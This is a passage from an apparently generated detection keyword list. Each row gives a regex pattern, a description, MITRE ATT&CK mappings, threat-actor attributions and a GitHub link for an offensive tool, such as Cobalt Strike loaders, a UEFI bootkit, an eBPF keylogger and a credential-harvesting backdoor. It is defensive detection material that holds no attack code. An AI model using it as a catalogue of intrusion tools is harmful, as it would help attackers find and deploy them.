29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36180" "*boku7/BokuLoader*",".{0,1000}boku7\/BokuLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36181" "*boku7/HOLLOW*",".{0,1000}boku7\/HOLLOW.{0,1000}","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. 
hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/HOLLOW","1","1","N/A","N/A","10","10","280","60","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z","36182" "*BokuLoader.cna*",".{0,1000}BokuLoader\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36183" "*BokuLoader.exe*",".{0,1000}BokuLoader\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36184" "*BokuLoader.x64*",".{0,1000}BokuLoader\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36185" "*bolt://localhost:7687*",".{0,1000}bolt\:\/\/localhost\:7687.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/CravateRouge/autobloody","1","0","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","36186" "*Bonfee/CVE-2022-0995*",".{0,1000}Bonfee\/CVE\-2022\-0995.{0,1000}","offensive_tool_keyword","POC","CVE-2022-0995 exploit","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tool","https://github.com/Bonfee/CVE-2022-0995","1","1","N/A","N/A","N/A","5","497","67","2022-03-27T09:07:01Z","2022-03-26T21:46:09Z","36188" "*BooExecutorImpl.cs*",".{0,1000}BooExecutorImpl\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - 
APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36189" "*book.hacktricks.xyz/*",".{0,1000}book\.hacktricks\.xyz\/.{0,1000}","offensive_tool_keyword","hacktricks.xyz","site often consulted by pentester","T1596 - T1592","TA0043","N/A","Black Basta","Reconnaissance","https://hacktricks.xyz","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A","36190" "*bootkit-rs.git*",".{0,1000}bootkit\-rs\.git.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","N/A","6","528","67","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z","36192" "*bootkit-rs-master*",".{0,1000}bootkit\-rs\-master.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","N/A","6","528","67","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z","36193" "*Booty\master_password_list.csv*",".{0,1000}Booty\\master_password_list\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","36194" "*BorjaMerino*Pazuzu*",".{0,1000}BorjaMerino.{0,1000}Pazuzu.{0,1000}","offensive_tool_keyword","Pazuzu","Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. 
The goal is that you can run your own binary directly from memory. This can be useful in various scenarios.","T1055 - T1027 - T1071 - T1059","TA0002 - TA0005 - TA0011","N/A","N/A","Exploitation tool","https://github.com/BorjaMerino/Pazuzu","1","1","N/A","N/A","N/A","3","215","64","2020-08-04T18:49:36Z","2015-10-05T12:23:17Z","36202" "*Bot_MSF_Exp_*.py*",".{0,1000}Bot_MSF_Exp_.{0,1000}\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","36203" "*Bot_Python_Poc_Log4j2_VMwareHorizon.py*",".{0,1000}Bot_Python_Poc_Log4j2_VMwareHorizon\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","36204" "*bpassthehash*",".{0,1000}bpassthehash.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","36206" "*bpf_keylogger: Log key presses and mouse button events systemwide using eBPF*",".{0,1000}bpf_keylogger\:\sLog\skey\spresses\sand\smouse\sbutton\sevents\ssystemwide\susing\seBPF.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","0","N/A","N/A","10","1","4","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z","36207" "*bpowerpick*",".{0,1000}bpowerpick.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36208" "*bpowershell_import(*",".{0,1000}bpowershell_import\(.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","36209" "*bpsexec_command*",".{0,1000}bpsexec_command.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","36210" 
"*bpsexec_command*",".{0,1000}bpsexec_command.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36211" "*bpsexec_psh*",".{0,1000}bpsexec_psh.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","36212" "*bpsinject*",".{0,1000}bpsinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36213" "*bpysecdump.exe*",".{0,1000}bpysecdump\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - 